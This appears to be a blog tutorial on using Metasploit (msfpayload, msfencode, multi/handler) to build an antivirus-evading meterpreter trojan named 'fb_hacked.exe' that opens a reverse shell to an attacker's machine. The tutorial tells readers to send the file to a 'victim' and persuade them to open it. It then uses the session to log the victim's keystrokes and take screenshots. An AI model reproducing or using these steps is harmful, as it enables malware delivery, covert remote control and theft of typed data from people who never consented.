BYPASS ANTIVIRUS WITH METASPLOIT PENETRATION TESTING

anti-virus-fun-icon

Hello guys. in my pervious tutorial of penetration testing we have seen to exploit windows using netapi or browser based exploit but this exploit does not able to bypass Antivirus or firewall of the windows. But guys in this tutorial I am going to show you how to bypass antivirus with Metasploit Framework. Here I make a Trojan virus and run it on the victim machine which helps to bypass the antivirus. Just follows these simple steps…

Note :- This exploit works on windows 2000, XP, Vista, Win 7 or may sometime works on windows 8 also.

 

Step 1 :- Here I am using backtrack5  which is a attacker System  now we open a console and write the following code.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.124.130 R | msfencode -t exe -c 16 >fb_hacked.exe

 bypass antivirus

 

Now the payload is ready in the root directory which is successfully encoded.

Step 2 :- Now we try to enter into msfconsole console, for that

                Open console and write msfconsole.

bypass antivirus

Step 3 :- Then we set the Payload using the following commands.

               use exploit/multi/handler

               set PAYLOAD windows/meterpreter/reverse_tcp

               (here PAYLOAD mean the code or exploit which is actually runs on the victim machine after exploitation and windows of the victim machine or meterpreter is used to open the meterpreter session of windows and reverse_tcp is use to connect back to attacker machine to victim machine.)

               set LHOST 192.168.124.130 (this is a backtrack ip address which is a attacker machine. you use ifconfig command to see the ip address of backtrack.)

               set LPORT 4444

               exploit

 bypass antivirus

Step 4 :- In above screen shot we run the exploit and wait for the victim click on exploit. Now we copy that exploit and send to the victim and request him/her to open that exploit.

4

Here we seen that the Antivirus is running on the victim machine.

bypass antivirus

 

bypass antivirus

 Now we successfully exploit the victim machine and we got a meterpreter sessions opened.

Step 5 :- Now we going to do some key logging in victim machine for that we use command.

          Keyscan_start

Now the Keylogging is started. Now we do task on victim machine. Open notepad and write some informations.

bypass antivirus

After completing the task on victim machine, then use the following command to dump the key logging.

  Keyscan_dump and hit enter

 bypass antivirus

 

Step 6 :- Now I am going to show one more interesting task of meterpreter, here now I take a screen shot of victim machine using screenshot command.

          Screenshot

 bypass antivirus

 

Leave a Reply

Your email address will not be published. Required fields are marked *